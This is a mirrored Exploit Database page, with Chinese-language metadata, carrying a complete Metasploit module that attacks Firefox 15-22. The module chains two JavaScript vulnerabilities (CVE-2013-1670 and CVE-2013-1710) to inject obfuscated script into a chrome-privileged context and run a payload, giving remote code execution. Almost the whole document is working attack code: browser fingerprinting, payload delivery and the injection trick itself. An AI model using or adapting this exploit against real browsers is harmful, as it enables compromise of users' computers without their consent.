Mozilla Firefox – toString console.time Privileged JavaScript Injection (Metasploit)

• Exploit Database
• 12 阅读

• 作者： Metasploit
  日期： 2014-08-19
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/34363/

• ##
  # This module requires Metasploit: http//metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  require 'msf/core'
  require 'rex/exploitation/jsobfu'
  
  class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::Remote::BrowserAutopwn
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
  
  autopwn_info({
  :ua_name=> HttpClients::FF,
  :ua_minver=> "15.0",
  :ua_maxver=> "22.0",
  :javascript => true,
  :rank => ExcellentRanking
  })
  
  def initialize(info = {})
  super(update_info(info,
  'Name' => 'Firefox toString console.time Privileged Javascript Injection',
  'Description'=> %q{
  This exploit gains remote code execution on Firefox 15-22 by abusing two separate
  Javascript-related vulnerabilities to ultimately inject malicious Javascript code
  into a context running with chrome:// privileges.
  },
  'License' => MSF_LICENSE,
  'Author'=> [
  'moz_bug_r_a4', # discovered CVE-2013-1710
  'Cody Crews', # discovered CVE-2013-1670
  'joev' # metasploit module
  ],
  'DisclosureDate' => "May 14 2013",
  'References' => [
  ['CVE', '2013-1670'], # privileged access for content-level constructor
  ['CVE', '2013-1710']# further chrome injection
  ],
  'Targets' => [
  [
  'Universal (Javascript XPCOM Shell)', {
  'Platform' => 'firefox',
  'Arch' => ARCH_FIREFOX
  }
  ],
  [
  'Native Payload', {
  'Platform' => %w{ java linux osx solaris win },
  'Arch' => ARCH_ALL
  }
  ]
  ],
  'DefaultTarget' => 0,
  'BrowserRequirements' => {
  :source=> 'script',
  :ua_name => HttpClients::FF,
  :ua_ver=> lambda { |ver| ver.to_i.between?(15, 22) }
  }
  ))
  
  register_options([
  OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", "" ])
  ], self.class)
  end
  
  def on_request_exploit(cli, request, target_info)
  send_response_html(cli, generate_html(target_info))
  end
  
  def generate_html(target_info)
  key = Rex::Text.rand_text_alpha(5 + rand(12))
  opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
  
  js = Rex::Exploitation::JSObfu.new(%Q|
  var opts = #{JSON.unparse(opts)};
  var key = opts['#{key}'];
  var y = {}, q = false;
  y.constructor.prototype.toString=function() {
  if (q) return;
  q = true;
  crypto.generateCRMFRequest("CN=Me", "#{Rex::Text.rand_text_alpha(5 + rand(12))}", "#{Rex::Text.rand_text_alpha(5 + rand(12))}", null, key, 1024, null, "rsa-ex");
  return 5;
  };
  console.time(y);
  |)
  
  js.obfuscate
  
  %Q|
  <!doctype html>
  <html>
  <body>
  <script>
  #{js}
  </script>
  #{datastore['CONTENT']}
  </body>
  </html>
  |
  end
  end